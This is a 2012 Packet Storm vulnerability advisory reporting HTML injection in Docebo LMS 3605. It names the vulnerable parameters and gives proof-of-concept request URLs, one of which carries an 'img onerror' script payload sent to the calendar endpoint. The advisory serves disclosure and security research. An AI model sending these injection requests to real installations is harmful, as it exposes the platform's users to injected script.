Docebo LMS 3605 HTML Injection

2012-04-26T00:00:00
ID PACKETSTORM:112239
Type packetstorm
Reporter HauntIT
Modified 2012-04-26T00:00:00

Description

                                        
                                            `[ TITLE ....... ][ Docebo LMS HTML Injection  
[ DATE ........ ][ 15.04.2012  
[ AUTOHR ...... ][ http://hauntit.blogspot.com  
[ SOFT LINK ... ][ http://www.docebo.com  
[ VERSION ..... ][ docebo_3605.zip  
[ TESTED ON ... ][ LAMP  
[ ----------------------------------------------------------------------- [  
  
[ 1. What is this?  
[ 2. What is the type of vulnerability?  
[ 3. Where is bug :)  
[ 4. More...  
  
[--------------------------------------------[  
[ 1. What is this?  
This is very nice CMS, You should try it! ;)  
  
[--------------------------------------------[  
[ 2. What is the type of vulnerability?  
HTML Injection.  
  
[--------------------------------------------[  
[ 3. Where is bug :)  
  
HTTP GET 'attack' should look like this:  
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10+payload  
  
Vulnerable parameter is :  
id_module_sel,   
ord,   
op_listview_idplayitem,  
working_area,  
(more?)  
  
  
Anyway, I was able to 'attack' application only in automated way.  
Directly accesing parameter id_module_sel with payload (html injection string)  
is not working. Setting few attacks (for example 10) could do adding to DB/cache(?)  
content (payload) and 'selecting it' with next request(with next payload).  
  
Wierd, but works. Question for now is how to automate this to 'real exploitation   
scenarion' ;) For education of course.  
  
Try this:  
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10}%3E%3Ch1%3Etest%3Cbr%3Etest2%3C%2fh1%3E  
  
Screens of attack You will find @ my blog. ;)  
  
And this:  
http://docebo/doceboLms/ajax.server.php?plf=lms&mn=calendar&op=set&index=0&id=%3Ch1%3E%3Cimg%20src=x%20onerror=alert%28123%29%3Eaaaaa%3C/h1%3E&_owner=1040&calEventClass=lms&private=on&start_day=15&start_month=4&start_year=2012&start_hour=09&start_min=00&start_sec=00&end_day=15&end_month=4&end_year=2012&end_hour=09&end_min=00&end_sec=00&category=a&title=aaaaaaaaaaaaaa&description=bbbbbbbbbbbbbbb  
  
Vulnerable parameters here are: id and index.  
  
[--------------------------------------------[  
[ 4. More...  
  
- http://hauntit.blogspot.com  
- http://www.docebo.com  
- http://www.google.com  
- http://portswigger.net  
[  
[--------------------------------------------[  
[ Ask me about new projects @ mail. ;)  
]  
[ Best regards  
[   
  
`